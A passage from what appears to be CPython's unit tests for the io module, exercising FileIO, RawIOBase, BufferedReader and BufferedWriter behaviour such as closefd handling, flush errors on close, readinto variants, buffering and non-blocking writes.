self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r",
encoding="utf-8", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", encoding="utf-8", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with warnings_helper.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8")
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', encoding="utf-8", closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", encoding="utf-8", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", buffering=0)
def test_invalid_newline(self):
with warnings_helper.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', encoding="utf-8", newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w", encoding="utf-8") as f:
f.write("egg\n")
with self.open(path, "r", encoding="utf-8") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os.fsencode(os_helper.TESTFN)))
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w', encoding="utf-8")
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w', encoding="utf-8")
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa', encoding="utf-8")
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
@threading_helper.requires_working_threading()
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(os_helper.TESTFN, "wb") as f:
f.write(s)
with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with threading_helper.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
os_helper.unlink(os_helper.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
def test_truncate_on_read_only(self):
rawio = self.MockFileIO(b"abc")
bufio = self.tp(rawio)
self.assertFalse(bufio.writable())
self.assertRaises(self.UnsupportedOperation, bufio.truncate)
self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@skip_if_sanitizer(memory=True, address=True, reason= "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not as easy there.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead.
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(os_helper.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
def test_bad_readinto_value(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: -1
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsNone(cm.exception.__cause__)
def test_bad_readinto_type(self):
rawio = io.BufferedReader(io.BytesIO(b"12"))
rawio.readinto = lambda buf: b''
bufio = self.tp(rawio)
with self.assertRaises(OSError) as cm:
bufio.readline()
self.assertIsInstance(cm.exception.__cause__, TypeError)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
